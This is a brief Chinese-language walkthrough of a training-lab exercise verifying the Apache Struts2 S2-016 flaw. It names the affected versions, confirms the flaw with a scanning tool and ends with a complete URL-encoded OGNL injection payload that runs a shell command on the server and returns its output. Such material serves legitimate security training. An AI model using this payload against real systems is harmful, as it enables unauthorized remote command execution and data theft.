Apache struct2(s2-016)漏洞验证

时间:2024-03-05 19:53:32

漏洞描述及影响版本

近期Struts2被曝重要漏洞,此漏洞影响struts2.0-struts2.3所有版本,可直接导致服务器被远程控制从而引起数据泄漏,影响巨大,受影响站点以电商、银行、门户、*居多.

以墨者学院为例

靶场链接:http://219.153.49.228:49386

先找出后缀为action的网页,发现http://219.153.49.228:49386/index.action存在,测试漏洞是否存在,可以使用Struts2漏洞检查工具来测试

 

 发现存在Struts2 (s2-016)漏洞,直接使用工具可进行命令执行,直接查看key.txt即可

 

 或者使用payload进行命令执行:

http://192.168.34.153/index.action?redirect:%24%7b%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String%5b%5d%7b%27ls%27%2c%27%2f%27%7d)).start()%2c%23b%3d%23a.getInputStream()%2c%23c%3dnew+java.io.InputStreamReader(%23b)%2c%23d%3dnew+java.io.BufferedReader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2c%23matt.getWriter().println(%23e)%2c%23matt.getWriter().flush()%2c%23matt.getWriter().close()%7d